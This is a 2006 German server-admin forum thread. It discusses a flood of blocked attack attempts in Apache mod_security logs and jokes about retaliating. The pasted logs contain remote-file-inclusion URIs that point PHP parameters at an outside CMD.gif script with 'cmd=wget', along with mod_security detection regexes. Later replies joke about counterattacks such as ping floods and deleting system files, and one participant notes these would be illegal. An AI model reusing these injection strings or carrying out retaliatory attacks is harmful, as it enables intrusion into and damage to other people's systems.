Page 1 of 1
neuer Bot? Ferien?
Posted: 2006-08-02 21:49
by ghoster1970
Code: Select all
[Tue Aug 01 14:31:16 2006] [error] [client 195.86.124.210] mod_security: Access denied with code 500. Pattern match "\\.php(3|4|5)?(\\?|&).*=(ht|f)tps?:/.*(\\?|&)" at REQUEST_URI [id "300018"] [rev "1"] [msg "Generic PHP code injection protection"] [severity "CRITICAL"] [hostname "xx.xx.xx.xx"] [uri "http://xx.xx.xx.xx/editprofile.php?pathtohomedir=http://webmail.hostfactory.ch/CMD.gif?&cmd=wget"]
[Tue Aug 01 14:31:16 2006] [error] [client 195.86.124.210] mod_security: Access denied with code 500. Pattern match "\\.php(3|4|5)?(\\?|&).*=(ht|f)tps?:/.*(\\?|&)" at REQUEST_URI [id "300018"] [rev "1"] [msg "Generic PHP code injection protection"] [severity "CRITICAL"] [hostname "xx.xx.xx.xx"] [uri "http://xx.xx.xx.xx/lib/tree/layersmenu.inc.php?myng_root=http://webmail.hostfactory.ch/CMD.gif?&cmd=wget"]
...
...
[Wed Aug 02 20:39:59 2006] [error] [client 210.51.162.45]
mod_security: Access denied with code 500. Pattern match "^GET (http|https|ftp)\\:/" at THE_REQUEST [severity "EMERGENCY"] [hostname "www.ebay.com"] [uri "http://www.ebay.com/"]
[Wed Aug 02 20:52:44 2006] [error] [client 212.227.93.233] Directory index forbidden by rule: /var/www/hosts/default/htdocs/
[Wed Aug 02 21:09:56 2006] [error] [client 210.51.162.45] mod_security: Access denied with code 500. Pattern match "^GET (http|https|ftp)\\:/" at THE_REQUEST [severity "EMERGENCY"] [hostname "www.ebay.com"] [uri "http://www.ebay.com/"]
Hab seit gestern mehr als 10.000 solcher Einträge in den Logs.
Ist das alleine mit den Ferien zu begründen?
Re: neuer Bot? Ferien?
Posted: 2006-08-02 22:00
by lord_pinhead
Glaub nicht, oder sind in den Niederlande grad Ferien? Wenn ja, kann es sein, schick ne Abuse raus oder lass es :)
Re: neuer Bot? Ferien?
Posted: 2006-08-02 22:07
by daemotron
Ist es eigentlich illegal, wenn man sich auf solche Attacken "proaktiv" zur Wehr setzt? Ich denke da so an floodping mit 1024kB großen "Nutzlasten" à là Winnuke... Modem- und ISDN-Usern müsste man auf die Tour doch 'n ziemlichen Schrecken einjagen können :D
Re: neuer Bot? Ferien?
Posted: 2006-08-02 22:18
by flo
Oder ein vorkomprimiertes 1GB-gif per gz ausliefern ... holla ... wäre doch was :-)
flo.
Re: neuer Bot? Ferien?
Posted: 2006-08-02 22:24
by lord_pinhead
Die armen Leute die normal auf die Seite surfen :D
Re: neuer Bot? Ferien?
Posted: 2006-08-02 22:37
by sledge0303
Es müßte während dieser Angriffsversuche ein Skript gestartet werden, Befehl: starte auf der Gegenseite (Angreifer) IE/Firefox, diese öffnen wiederum neue Browserfenster "Inhalt: nein nein das darfst du nicht!!! dazu noch einen Stinkefinger..."
Es werden so viele neue Fenster geöffnet bis der Speicher voll ist und seine Kiste absäuft!!!
Re: neuer Bot? Ferien?
Posted: 2006-08-02 22:50
by daemotron
Ich werden Delinquenten einfach künftig einen Super-Virus verpassen:
http://ripfiles.e-workers.de/nettz/virus.php
Re: neuer Bot? Ferien?
Posted: 2006-08-02 23:01
by sledge0303
Es reicht schon wenn auf einer Windoofs-Büchse "ntldr" löschst...
Die meisten achsosuperschlauen Hacker wissen gar nicht wie man das wieder, mit Ausnahme einer Neuinstallation, beheben kann :D
Naja, mit Virus oder löschen von Systemdateien... leider ist beides strafbar...aber träumen darf man doch davon...
Re: neuer Bot? Ferien?
Posted: 2006-09-01 09:00
by centro
Ich weis zwar nicht ob das bei Windoof auch zieht aber ich hab mal vor geraumer Zeit was von "Hack umleitung" gelesen.
Sprich nach schnellem 3 maligen falschen Login wird jeder versuch der IP wie ein spiegel zurück geworfen und der lustige Mensch versucht bei sich selber rein zu kommen!
Sowas würde ich so gerne mal ausprobieren und nebenbei zusehen wie er versucht bei sich reinzukommen! Da könnt ich bestimmt stundenlang vorm Rechner sitzen! :oops:
Re: neuer Bot? Ferien?
Posted: 2006-09-01 13:15
by isotopp
jfreund wrote:Ist es eigentlich illegal, wenn man sich auf solche Attacken "proaktiv" zur Wehr setzt? Ich denke da so an floodping mit 1024kB großen "Nutzlasten" à là Winnuke... Modem- und ISDN-Usern müsste man auf die Tour doch 'n ziemlichen Schrecken einjagen können :D
Und wenn Du Equipment von Dritten auf dem Weg mit Deinem "Gegenangriff" erwischt, hast Du die Grünen selbst im Haus. Nicht wirklich eine schlaue Idee - Angriffe auf (Internet-) Infrastruktur sind immer gleich Terrorismus. Am nächsten Morgen wachst Du in Guantanamo auf.
Re: neuer Bot? Ferien?
Posted: 2006-09-01 16:24
by Joe User
Code: Select all
if $CONNECT > 3 then redirect $USER to 256.256.256.256 endif
Re: neuer Bot? Ferien?
Posted: 2006-09-01 19:24
by centro
Ist das der Code für IP-Tables das der Versucht bei sich selbst rein zu kommen?
Re: neuer Bot? Ferien?
Posted: 2006-09-01 20:06
by captaincrunch
Diese Frage kannst du dir ganz einfach, auch ohne dir alles vorkauen zu lassen mit kurzem Blick in die Doku selbst beantworten.
Re: neuer Bot? Ferien?
Posted: 2006-09-01 20:35
by elch_mg
hm... meine IP ist mal wieder nur 127.0.0.1..
(wer die Geschichte kennt: Nein, ich bin ein anderer Elch)
Re: neuer Bot? Ferien?
Posted: 2006-09-19 17:37
by traced
sagt euch das T-Shirt "i hacked 127.0.0.1" was? *fg*
Re: neuer Bot? Ferien?
Posted: 2006-09-19 22:51
by muenchi
Für alle die es nicht kennen (und nicht lange rumsuchen wollen)
http://www.stophiphop.com/modules/news/ ... toryid=184
Re: neuer Bot? Ferien?
Posted: 2006-09-20 01:05
by nyxus
traced wrote:sagt euch das T-Shirt "i hacked 127.0.0.1" was? *fg*
*der* gefällt mir ausserordentlich gut! :-)
Re: neuer Bot? Ferien?
Posted: 2006-09-20 02:08
by traced
Die Geschichte dazu is eigentlich noch besser als das Shirt.
Hat zwar nichts mit dem harten Admin Alltag zu tun,
aber wer ein wenig "Aufmunterung" sucht, sollte mal hier vorbeischaun:
http://einzeller.tk :)
vg
Basti